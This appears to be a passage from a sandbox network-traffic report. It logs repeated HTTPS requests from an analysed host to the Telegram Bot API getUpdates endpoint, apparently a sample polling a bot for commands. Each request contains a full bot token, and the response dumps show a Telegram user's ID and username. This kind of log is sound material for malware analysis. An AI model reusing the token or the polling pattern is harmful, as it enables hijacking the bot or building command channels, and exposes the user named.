                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:19 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        30192.168.2.449791149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:20 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:20 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:20 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:20 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        31192.168.2.449792149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:21 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:21 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:21 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:21 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        32192.168.2.449793149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:22 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:22 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:22 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:22 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        33192.168.2.449794149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:23 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:23 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:23 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:23 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        34192.168.2.449795149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:24 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:24 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:24 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:24 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        35192.168.2.449796149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:25 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:25 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:25 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:25 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        36192.168.2.449797149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:26 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:27 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:26 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:27 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        37192.168.2.449798149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:27 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:27 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:27 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:27 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        38192.168.2.449799149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:28 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:29 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:29 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:29 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        39192.168.2.449800149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:29 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:30 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:30 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:30 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        40192.168.2.449801149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:30 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:31 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:31 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:31 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        41192.168.2.449802149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:31 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:32 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:32 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:32 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
